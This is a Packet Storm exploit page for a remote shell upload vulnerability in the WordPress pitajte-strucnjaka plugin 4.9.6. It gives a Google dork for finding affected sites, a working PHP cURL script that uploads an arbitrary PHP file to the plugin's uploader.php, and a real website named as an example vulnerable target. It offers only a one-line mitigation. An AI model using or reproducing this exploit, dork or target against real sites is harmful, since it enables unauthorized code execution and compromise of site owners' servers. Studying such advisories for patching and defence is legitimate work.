exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress pitajte-strucnjaka 4.9.6 Shell Upload

WordPress pitajte-strucnjaka 4.9.6 Shell Upload
Posted Jan 25, 2019
Authored by KingSkrupellos

WordPress pitajte-strucnjaka plugin version 4.9.6 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 930445443ba80f5f43d55ad6c8f92ff3ef3caf629402b118a7786da6ab7e8471

WordPress pitajte-strucnjaka 4.9.6 Shell Upload

Change Mirror Download
####################################################################

# Exploit Title : WordPress pitajte-strucnjaka Plugins 4.9.6 Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/01/2019
# Vendor Homepage : wordpress.org
# Software Information Link : bol.rs/pitajte-strucnjaka
# Software Version : 4.9.6
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/pitajte-strucnjaka/''
# Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]

####################################################################

# Description :
*************

* "pitajte-strucnjaka" is open source software for WordPress CMS.

* WordPress Plugin pitajte-strucnjaka is prone to a vulnerability that lets attackers
upload arbitrary files. The issue occurs because
the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary PHP code and run it
in the context of the Web server process. This may facilitate
unauthorized access or privilege escalation; other attacks are also possible.
WordPress Plugin pitajte-strucnjaka versions 4.9.6 are vulnerable;
prior versions may also be affected.
There is no exact information about software elsewhere [ prior versions etcetra... ]

* This software [ WordPress WordPress pitajte-strucnjaka Plugins 4.9.6 and other versions ]
allows the attacker to upload or transfer files of dangerous
types that can be automatically processed within the product's environment.

####################################################################

# Solution [ Fix the Bug ] :
***********************
Restrict access to the /wp-content/plugins/pitajte-strucnjaka/upload/uploader.php script (e.g. via .htaccess)

####################################################################

# Remote File Upload Exploit :
**************************

/wp-content/plugins/pitajte-strucnjaka/upload/uploader.php

# Directory File Path :
*******************

/wp-content/uploads/....

####################################################################

<?php

$uploadfile="yourfilenamehere.php";
$ch =
curl_init("http://www.VULNERABLESITE/wp-content/plugins/pitajte-strucnjaka/upload/uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

####################################################################

# Example Vulnerable Site :
*************************

[+] bol.rs/wp-content/plugins/pitajte-strucnjaka/upload/uploader.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    5 Files
  • 29
    Sep 29th
    12 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close